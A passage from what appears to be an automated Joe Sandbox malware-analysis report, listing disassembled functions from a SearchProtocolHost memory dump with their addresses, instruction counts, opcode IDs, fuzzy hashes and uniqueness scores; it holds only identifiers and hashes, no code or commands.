                                                                                      • Opcode Fuzzy Hash: 195edc9a70ac3ff6f4ab0ac3ba10063ba9292c0f540086c5dcbbc85c9beac9d7
                                                                                      • Instruction Fuzzy Hash: 2851FFBAA01A56AFD711CF6CC880A69B7B0FF84711F1843A9E845DB750E734E991CBD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037CE363 Relevance: .2, Instructions: 158COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: c592caff3c19402cb3de9d88cae81cfa54321c6ba8378048903f8cabc75dd857
                                                                                      • Instruction ID: 81e915c72c67c74941a11485b02f5dbe6cba2517116cbda7d59b179aa77ba987
                                                                                      • Opcode Fuzzy Hash: c592caff3c19402cb3de9d88cae81cfa54321c6ba8378048903f8cabc75dd857
                                                                                      • Instruction Fuzzy Hash: 9F515B75200A44DFDB21EFA8C994EAAB3FEFB48740F04056EE556D76A0D734E941CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03797072 Relevance: .2, Instructions: 158COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fb101c374379b0ea2f71a98d027c3869e48d95305f1f765d1e3ecd8d80b4ced4
                                                                                      • Instruction ID: 1e3fc932ab62fe8910743ebbe51a9289e0ff29ab65d1989f2a369f739e605d4a
                                                                                      • Opcode Fuzzy Hash: fb101c374379b0ea2f71a98d027c3869e48d95305f1f765d1e3ecd8d80b4ced4
                                                                                      • Instruction Fuzzy Hash: BA510F34A10609EFEF19DF68D8887BDB7B9BF44315F1442AAE5029B390DB74D911DB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 038586A8 Relevance: .2, Instructions: 152COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 97a442ca310a420623df8722d7fe3f2e304ddf039c2609459843c213f8626c21
                                                                                      • Instruction ID: d24500f9f2543ec1b1acb0b1b8ff5c46b5a8cd36574571b17c85286def69508d
                                                                                      • Opcode Fuzzy Hash: 97a442ca310a420623df8722d7fe3f2e304ddf039c2609459843c213f8626c21
                                                                                      • Instruction Fuzzy Hash: B341E3357017259BDB29DBA9C894B7BF79AEF84660F0882DAFC15CB290DB34D801C791
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0379510D Relevance: .1, Instructions: 149COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 60fcee8ed8f72312891488347e66f21343bb338e1c702b9ffad42b9a9214c549
                                                                                      • Instruction ID: c71e9ae81ccada9df0f20a35665a42ff62d51fcd4c2c93a1e0e743c9e19893c3
                                                                                      • Opcode Fuzzy Hash: 60fcee8ed8f72312891488347e66f21343bb338e1c702b9ffad42b9a9214c549
                                                                                      • Instruction Fuzzy Hash: B4518FB1A013259FFF22DFA8D844BADB3B4BB0A764F14025AE901FF351D774A9408B51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037CA350 Relevance: .1, Instructions: 139COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 84692a3bacfe1de9148dedec055eafe61e75df66176451a2de03c40567b2b6a7
                                                                                      • Instruction ID: 451a7d631d27687be06b66830319894169fd0f54b26f2066fe218e66fd7aee23
                                                                                      • Opcode Fuzzy Hash: 84692a3bacfe1de9148dedec055eafe61e75df66176451a2de03c40567b2b6a7
                                                                                      • Instruction Fuzzy Hash: 02412375690B45ABCB94FFAC9C85B7A7764EB44704F0004ADED16EF281E7719901C790
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03863157 Relevance: .1, Instructions: 139COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3c97196c013495471bf058e18471a8d9ec1789ada60b4918689687285dff22b1
                                                                                      • Instruction ID: d7ef0730bb357ca06b661c99e87cd1dd73dca99855659cf5adaa0e87b7a71642
                                                                                      • Opcode Fuzzy Hash: 3c97196c013495471bf058e18471a8d9ec1789ada60b4918689687285dff22b1
                                                                                      • Instruction Fuzzy Hash: F8516D75200606EFCB15CFA4C584A56FBB9FF45305F1981EAE809DF261E3B1E945CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C0118 Relevance: .1, Instructions: 138COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 832f466dce9ef88482f2b55d4e70f37a93f1888f8b68d68dcb5ba0b8a771ae4f
                                                                                      • Instruction ID: 9eca5acf2e0681bdf8997078ce8c6789321571003edd7ffb0297df26dd584165
                                                                                      • Opcode Fuzzy Hash: 832f466dce9ef88482f2b55d4e70f37a93f1888f8b68d68dcb5ba0b8a771ae4f
                                                                                      • Instruction Fuzzy Hash: 2841AA7A921298DBCB14DF98C440AEEF7B4BF48708F18826EE815EB250D735DD41CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2670 Relevance: .1, Instructions: 137COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                                                                                      • Instruction ID: dbe2eede41799edf48e8c3d517930850b0698158d2a18b7a7eba6cb86e5c8a02
                                                                                      • Opcode Fuzzy Hash: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                                                                                      • Instruction Fuzzy Hash: 84515C75A00619CFCB58CF98C880AADF7B5FF84714F1881A9D815E7390D735AE41CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03796074 Relevance: .1, Instructions: 133COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2480402846f28d7f1c22e25e44a937f9e94cf11ebac50117ffa337a3f64c122e
                                                                                      • Instruction ID: 59451d69c245d83e3de963c9bf279259d30d4b80c464b2dc12df93d49d0781ad
                                                                                      • Opcode Fuzzy Hash: 2480402846f28d7f1c22e25e44a937f9e94cf11ebac50117ffa337a3f64c122e
                                                                                      • Instruction Fuzzy Hash: C051C074A40606DBDF29DB28CC44BA9B7B5AF01324F1883EAD2599B3C2E7749981CF40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378B0D6 Relevance: .1, Instructions: 131COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4362577b60c1958e1845ecfbd70fadca5b9492ea8b450dd571be0fabf4c7bff1
                                                                                      • Instruction ID: 8738f05b3bab4c206c107d795bc5c4895c4fc73b3f69fe4ab635a82a3a64e925
                                                                                      • Opcode Fuzzy Hash: 4362577b60c1958e1845ecfbd70fadca5b9492ea8b450dd571be0fabf4c7bff1
                                                                                      • Instruction Fuzzy Hash: D341CCB4A80702EFDB22EF68C894B6ABBF8EF44754F0444A9E542DF650E770D901CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 038581EE Relevance: .1, Instructions: 129COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                      • Instruction ID: bd7baa35c7536eede81460d04ead16c42bc0687d982c927ba83b005ed2e58fe1
                                                                                      • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                      • Instruction Fuzzy Hash: 9A417575B00215ABDF14DFE9C894AAFBBBAEF88650F1840AABC15E7341D670DE01C751
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037907A7 Relevance: .1, Instructions: 128COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e104074feef1d1663d90936171f17486329b74f65ff533eb7469598b92ae0419
                                                                                      • Instruction ID: 3da4bb420b9b4211e3442c96428414434dc98650320d5549665e680c06c3d3f3
                                                                                      • Opcode Fuzzy Hash: e104074feef1d1663d90936171f17486329b74f65ff533eb7469598b92ae0419
                                                                                      • Instruction Fuzzy Hash: 3D418F71610B019FEB28CF68E884A22B7F9FF48314B144BAED5578BA51E730E855DB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037BA390 Relevance: .1, Instructions: 127COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4bf7f934c31eb5299b90530ad8bbd07cd0477f227203344e8cfd72b76230cb0e
                                                                                      • Instruction ID: ce1a3490b7fd2cdc0973c8534b0f9ffcb6454168cc2fca10753df7e26e43be43
                                                                                      • Opcode Fuzzy Hash: 4bf7f934c31eb5299b90530ad8bbd07cd0477f227203344e8cfd72b76230cb0e
                                                                                      • Instruction Fuzzy Hash: B5418B36A44605CFCB65EF6CD494BEDB7B0FF48320F1801A9D811AB295DB349940DBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037BD600 Relevance: .1, Instructions: 126COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fd3e4d1a4b377ceafcf1aedafbf1550e0b4b7163cf049112484abb0534377215
                                                                                      • Instruction ID: 76978f41ccc4413789061de6ae0a41a5fe751d08e4588b1929e836cc9635fac5
                                                                                      • Opcode Fuzzy Hash: fd3e4d1a4b377ceafcf1aedafbf1550e0b4b7163cf049112484abb0534377215
                                                                                      • Instruction Fuzzy Hash: E341937A100745DFD320FF69D984F6AB7B8FB85360F04066DEA158B251DB31E811CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C0630 Relevance: .1, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                                                                                      • Instruction ID: d06586396ffbeca3b97b021662a227316606eebef5fc4bffefe42112dad7b538
                                                                                      • Opcode Fuzzy Hash: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                                                                                      • Instruction Fuzzy Hash: 32411975A10745EFCB24CF98C980AAAB7F8FF48700B10496DE556EB651D730EA44CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0385D7A7 Relevance: .1, Instructions: 120COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6c043cad1f73fb91eea88fcec09bb29597a61a9d6f7120f7ba178f41daff8017
                                                                                      • Instruction ID: 36e3d26218ab4b6703c869ba13c6eced84fafc38ef9ef1cf3014b56182a3a4f1
                                                                                      • Opcode Fuzzy Hash: 6c043cad1f73fb91eea88fcec09bb29597a61a9d6f7120f7ba178f41daff8017
                                                                                      • Instruction Fuzzy Hash: 7741DF756047018BD325EFA8C884B2AB7E6EBC4354F0849ACFC86CB3A1EB34D849C751
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0379254C Relevance: .1, Instructions: 119COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 59529c00304946b3e9e47906c77a8e309a6e049695e4fb068939bbcd38e05242
                                                                                      • Instruction ID: 4e12ef447a96c7e8c4172259f479cd244dc0378c7708144f364fd3ebd42bf7f0
                                                                                      • Opcode Fuzzy Hash: 59529c00304946b3e9e47906c77a8e309a6e049695e4fb068939bbcd38e05242
                                                                                      • Instruction Fuzzy Hash: 3941AD74501708EFDB24FF24E940B59B7F5FF48314F248ADAC10A9BAA2EB30A941CB41
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C1796 Relevance: .1, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 51347516dc44fe092ae6b76d233db18a8e75c5d6afa2834020c504902dcde2d2
                                                                                      • Instruction ID: a6a56fc10e86661a4dd6c858897c7d373ae8aa486b52e461cc71b3cc9f62d946
                                                                                      • Opcode Fuzzy Hash: 51347516dc44fe092ae6b76d233db18a8e75c5d6afa2834020c504902dcde2d2
                                                                                      • Instruction Fuzzy Hash: 4E415979A04645DFCB15CF98D880B99B7F1FB89724F1881AEE849EB385C738A941CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03810227 Relevance: .1, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 36448bbe90aa0f89dcb9d39cd420333016abdaaf3dd4dfd9a292f107502a3f1e
                                                                                      • Instruction ID: 6d960c917fd8969a906424432250162584ebedbbc09833396799c496b198d45b
                                                                                      • Opcode Fuzzy Hash: 36448bbe90aa0f89dcb9d39cd420333016abdaaf3dd4dfd9a292f107502a3f1e
                                                                                      • Instruction Fuzzy Hash: 1D419F766047419FC321DFA8DC44A6AB3E9FFC8700F080A69F899CB690E730D955C7A6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03794779 Relevance: .1, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c1919303ab771b22f3b716f4b522b179fdaa82c2245385769957e47c459588f9
                                                                                      • Instruction ID: 3f21cf9810ccc9bb74a6e86ce3cc4e8dd9d68069e14c943d142f221062f821ee
                                                                                      • Opcode Fuzzy Hash: c1919303ab771b22f3b716f4b522b179fdaa82c2245385769957e47c459588f9
                                                                                      • Instruction Fuzzy Hash: 1D4129746043418FEB25DF29E894F3AB7E9FF85350F1846AEE5418B2A1D730D842DB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037A01F1 Relevance: .1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 13b135b9faa8f4253b9b9cf5c563ed9f4eb926467a7eddadf7842a740e4e2e16
                                                                                      • Instruction ID: 9f99b1da434dd400c94a5c005534cf96f298140b7465282209666da719ffb296
                                                                                      • Opcode Fuzzy Hash: 13b135b9faa8f4253b9b9cf5c563ed9f4eb926467a7eddadf7842a740e4e2e16
                                                                                      • Instruction Fuzzy Hash: 16317D35A00744AFDB11CFACCC84BAABBF9EF44350F0847AAE855DB392D6748844CB65
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037B9194 Relevance: .1, Instructions: 105COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: f2b99e2fbff1dad01a026ab91f5020f00b519b302e3e57e213b6f04fa052c1b0
                                                                                      • Instruction ID: 0333644635c241bda52248c9d77a6d73142957dbefc9a6dc75940234fcfc6825
                                                                                      • Opcode Fuzzy Hash: f2b99e2fbff1dad01a026ab91f5020f00b519b302e3e57e213b6f04fa052c1b0
                                                                                      • Instruction Fuzzy Hash: 30318276E00728AFDB61CB68CC44FDAB7B5AF86710F1501E9EA9CAB240DB309D449F51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03795622 Relevance: .1, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a6e3383720d685ebbf9b5c6c0c7e1d7fc1ddefef4b40874d7f4da4878bd93c7b
                                                                                      • Instruction ID: 0e7d2db8c1e56218fada4b2d0808b3a5a76a9e762aa6110cae0f4178436575df
                                                                                      • Opcode Fuzzy Hash: a6e3383720d685ebbf9b5c6c0c7e1d7fc1ddefef4b40874d7f4da4878bd93c7b
                                                                                      • Instruction Fuzzy Hash: 2031D235201B12EFEB56EF24D944BAAF779BF85B24F040256E9018BB50DB70E820DB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03794180 Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
